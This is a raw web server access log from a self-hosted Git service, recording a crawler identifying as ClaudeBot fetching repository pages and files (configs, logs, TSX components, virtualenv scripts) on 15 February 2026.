-] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 10955] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 23715] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html?display=source" [Client 216.73.216.188] [Length 32424] [Gzip 9.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" [Client 216.73.216.188] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 38745] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 48135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" [Client 216.73.216.188] [Length 10873] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" [Client 216.73.216.188] [Length 11044] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" [Client 216.73.216.188] [Length 14389] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 216.73.216.188] [Length 11572] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" [Client 216.73.216.188] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:03 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10871] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 10144] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 47757] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 10140] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 10147] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 69273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10893] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 216.73.216.188] [Length 11024] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip?display=source" [Client 216.73.216.188] [Length 11561] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 9453] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16523] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" [Client 216.73.216.188] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14258] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log?display=rendered" [Client 216.73.216.188] [Length 10936] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" [Client 216.73.216.188] [Length 11605] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13978] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py?display=source" [Client 216.73.216.188] [Length 12966] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13923] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 9924] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14714] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log?display=source" [Client 216.73.216.188] [Length 16190] [Gzip 7.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/assets/js/script.js" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 216.73.216.188] [Length 10942] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10882] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" [Client 216.73.216.188] [Length 11453] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" [Client 216.73.216.188] [Length 10148] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 216.73.216.188] [Length 10941] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 216.73.216.188] [Length 10941] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log?display=rendered" [Client 216.73.216.188] [Length 10944] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" [Client 216.73.216.188] [Length 12997] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" [Client 216.73.216.188] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf?display=rendered" [Client 216.73.216.188] [Length 10904] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10861] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 10141] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Ffallback_stream_access.log" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.2" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" 